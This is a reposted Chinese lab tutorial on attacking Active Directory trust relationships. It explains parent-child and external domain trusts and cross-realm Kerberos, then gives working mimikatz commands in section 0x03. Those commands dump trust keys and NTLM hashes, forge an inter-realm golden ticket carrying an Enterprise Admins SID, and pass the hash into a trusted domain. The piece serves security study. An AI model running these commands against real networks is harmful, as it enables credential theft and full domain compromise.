域之间渗透

2018 年 7 月 25 日 黑白之道




0x00 介绍


大一点企业或公司,都有自己的内网系统,有着各种防护的系统,流量审计,镜像等这些系统。然而这些都是在各种域下,不同部门也是存在不同的域环境,如果拿到一个域控,就可以进行其它域的渗透。这篇文章,先讲解下域之间的关系,在利用域关系进行下一步的渗透。

 

0x01 环境搭建


windows 2012 (hack.com 192.168.199.151) 本文中称为A 域

windows 2012 (child.hack.com 192.168.199.68) 本文中称为CA 域

windows 2008 (localtest.com 192.168.199.129) 本文中称为B 域


A域与CA域是”within forest“ 关系,内部信任是可以传递,这里子域的信任搭建很简单,就不细说了,说一下子域的加入,在CA域的域控搭建完后,选择加入一个存在的域,然后其中有个DSRM 密码:



DSRM账户是域控的本地管理员账户,并非域的管理员帐户。所以DSRM密码同步之后并不会影响域的管理员帐户。 这里有一个DSRM 持久化 ,因为要修改注册表,我反正不喜欢用。


B域信任CA域,属于外部信任,不能传递信任关系,CA域可以访问B域中的资源,讲下这里的搭建过程:


在B域domain trusts设置外部信任后,CA域也会自动创建,可以参考这里:



信任创建完过后,还要设置相应的share文件夹及可以访问的组和用户,参考这里,说一下本环境的搭建:


1、WIN10 加入CA域。


    2.建立一个全局的组GCB。



    3.在CA域建立一个IT OU,添加用户child-ita。



    4.在B域中建立一个本地share 组,把CA域的GCB添加到这里,这里添加的时候需要输入CA的用户名和密码验证。



    5.在B域的DC的C盘中建立一个share的分享文件夹,把share组的权限添加到当中。



    好了,这个外部的信任搭建完成,B信任CA域,所以在CA域的GCB的用户,可以访问在B域DC中share的文件夹内容。


    这里没有那些VLAN划分,网络隔离这些东西了。我简单的域环境就搭建完成了。结构图如下:


     

    0x02 多个域之间关系


    这里涉及到kerberos 认证的过程,不清楚的可以看看我前面的文章。


    在client 通过AS 服务的验证过后,会得到这个client的TGT(TGT包含了当前client所属组及权限,还有其他林中域的组,例如:universal groups)。client利用TGT朝DC请求TGS,然后利用TGS向目标服务器请求访问资源。TGT的生命周期默认10小时,所以攻击者只要拿到KRBTGT的hash password就可以自己伪造签名TGT,这也就是mimikatz生成的黄金票据。这就是域的验证过程。


    在一个林中,CA域中的client要访问B域中的服务器的资源,先看下3个域的信任关系:


    A域和CA域(就是A的子域):



    B域:


    拥有多个域的大多数组织都需要用户访问位于不同域中的共享资源,并且信任允许具有多个域的组织授予不同域中的用户访问共享资源的权限。域林是相互信任的域容器的集合。森林本身也可能在它们之间有信任。内部信任具有传递关系,A信任B,B信任C,所以A也是信任C的,但是外部信任不能传递。


    从下图看下在不同域的访问过程:



    在两个域互相信任过后,会有一个信任密码及在每个域中注册一个ticket-granting 服务,用来提供跨域的服务。在上图可以看见蓝色的第4步,得到inter-realm(由域之间信任密码生成)的加密和签名的TGT,向另一个域DC请求TGS,绿色域DC使用信任密码验证通过后,生成了客户端要访问的绿色应用服务器的TGS票据。


    Gold Ticket中默认包含了Enterprise Admin 组的关系,而Enterprise Admin又是AD域中Administrator 组的成员。在其中还涉及到了sidHistory和SID过滤安全机制,所以攻击者可以伪造kerberos 票据来获取到域中的Enterprise Admin权限。所以下面我就来介绍下,如何利用Mimikatz 伪装 域信任票据。

     

    0x03 域之间渗透


    伪造内部信任AD林中的信任票据


      我这里是在子域下的一个普通用户,目标利用伪造trust key来获取AD的访问权限:



      1)先利用mimikatz 在域控dump出来的数据privilege::debug lsadump::trust /patch :




      2)在利用trust key 来伪造凭证是属于EA组的,用户名可以随便填写:


      kerberos::golden /domain:child.hack.com /sid:S-1-5-21-840356815-2954379092-972630321 /sids:S-1-5-21-1863527717-1245757989-2975568438-519 /krbtgt:ac51f0ddaf0246a556f1978dd12d2a0f /user:hack$ /ptt



      解释下这些参数怎么获取:


      domain:当前子域,sid:当前子域SID,sids:信任域的SID,也就是父域,krbtgt:当前域的krbtgt的值,user是trust account,不确定可以使用dcsync在看下。



      3)misc::cmd弹出CMD窗口,你也可以导出成Ticket,在导入来获取权限。



      2.访问信任域中的资源


      1) 在CA域的DC中,mimikatz 执行privilege::debug lsadump::lsa /patch 先获取到可以访问B域用户的ntlm


      2) sekurlsa::pth /user:child-ita /domain:child.hack.com /ntlm:e45a314c664d40a227f9540121d1a29d /run:powershell.exe 利用信任的用户NTLM,访问B域上的分享文件夹。


       

      0x04 总结


      本文先大概的介绍了域信任的关系,解释了其中用户组认证时的过程,以及涉及到的安装过程。并且利用mimikatz 在不同的信任关系下来利用用户的NTLM伪造和签名trusts ticket来获取域上的资源。在外部的信任中,只有在信任域中的组中的那些被信任域用户,才能访问到信任域中有指定权限的分享文件夹。所以在拿到域控权限的时候,lsadump::lsa /injectlsadump::trust /patch这个命令是一定要有的。


      文章出处:安全客

      原文链接:https://www.anquanke.com/post/id/152382

      你可能喜欢

      渗透过程中的端口反弹

      域渗透中找DC

      渗透指点站点笔记分享

      登录查看更多
      0

      相关内容

      专知会员服务
      42+阅读 · 2020年7月7日
      【2020新书】实战R语言4,323页pdf
      专知会员服务
      100+阅读 · 2020年7月1日
      【干货书】现代数据平台架构,636页pdf
      专知会员服务
      253+阅读 · 2020年6月15日
      【SIGMOD2020-腾讯】Web规模本体可扩展构建
      专知会员服务
      29+阅读 · 2020年4月12日
      【ICLR2020-哥伦比亚大学】多关系图神经网络CompGCN
      专知会员服务
      49+阅读 · 2020年4月2日
      深度神经网络实时物联网图像处理,241页pdf
      专知会员服务
      76+阅读 · 2020年3月15日
      后渗透利用msf关闭防火墙
      黑白之道
      8+阅读 · 2019年8月24日
      【机器学习】无处不在的机器学习
      产业智能官
      4+阅读 · 2019年8月18日
      渗透某德棋牌游戏
      黑白之道
      12+阅读 · 2019年5月17日
      Kali Linux 渗透测试:密码攻击
      计算机与网络安全
      16+阅读 · 2019年5月13日
      Kong 1.1 带来声明式配置与无数据库部署模式
      开源中国
      8+阅读 · 2019年3月28日
      基于Web页面验证码机制漏洞的检测
      FreeBuf
      7+阅读 · 2019年3月15日
      威胁情报驱动:F3EAD 之利用
      计算机与网络安全
      4+阅读 · 2018年12月28日
      论文落地 101:算法工程化的那些坑
      PaperWeekly
      13+阅读 · 2018年11月3日
      消息队列技术点梳理(思维导图版)
      架构文摘
      3+阅读 · 2018年4月3日
      如何运用Python建一个聊天机器人?
      七月在线实验室
      17+阅读 · 2018年1月23日
      Arxiv
      5+阅读 · 2020年3月16日
      Arxiv
      5+阅读 · 2018年5月1日
      Arxiv
      5+阅读 · 2018年3月6日
      Arxiv
      6+阅读 · 2018年1月14日
      VIP会员
      相关VIP内容
      专知会员服务
      42+阅读 · 2020年7月7日
      【2020新书】实战R语言4,323页pdf
      专知会员服务
      100+阅读 · 2020年7月1日
      【干货书】现代数据平台架构,636页pdf
      专知会员服务
      253+阅读 · 2020年6月15日
      【SIGMOD2020-腾讯】Web规模本体可扩展构建
      专知会员服务
      29+阅读 · 2020年4月12日
      【ICLR2020-哥伦比亚大学】多关系图神经网络CompGCN
      专知会员服务
      49+阅读 · 2020年4月2日
      深度神经网络实时物联网图像处理,241页pdf
      专知会员服务
      76+阅读 · 2020年3月15日
      相关资讯
      后渗透利用msf关闭防火墙
      黑白之道
      8+阅读 · 2019年8月24日
      【机器学习】无处不在的机器学习
      产业智能官
      4+阅读 · 2019年8月18日
      渗透某德棋牌游戏
      黑白之道
      12+阅读 · 2019年5月17日
      Kali Linux 渗透测试:密码攻击
      计算机与网络安全
      16+阅读 · 2019年5月13日
      Kong 1.1 带来声明式配置与无数据库部署模式
      开源中国
      8+阅读 · 2019年3月28日
      基于Web页面验证码机制漏洞的检测
      FreeBuf
      7+阅读 · 2019年3月15日
      威胁情报驱动:F3EAD 之利用
      计算机与网络安全
      4+阅读 · 2018年12月28日
      论文落地 101:算法工程化的那些坑
      PaperWeekly
      13+阅读 · 2018年11月3日
      消息队列技术点梳理(思维导图版)
      架构文摘
      3+阅读 · 2018年4月3日
      如何运用Python建一个聊天机器人?
      七月在线实验室
      17+阅读 · 2018年1月23日
      Top
      微信扫码咨询专知VIP会员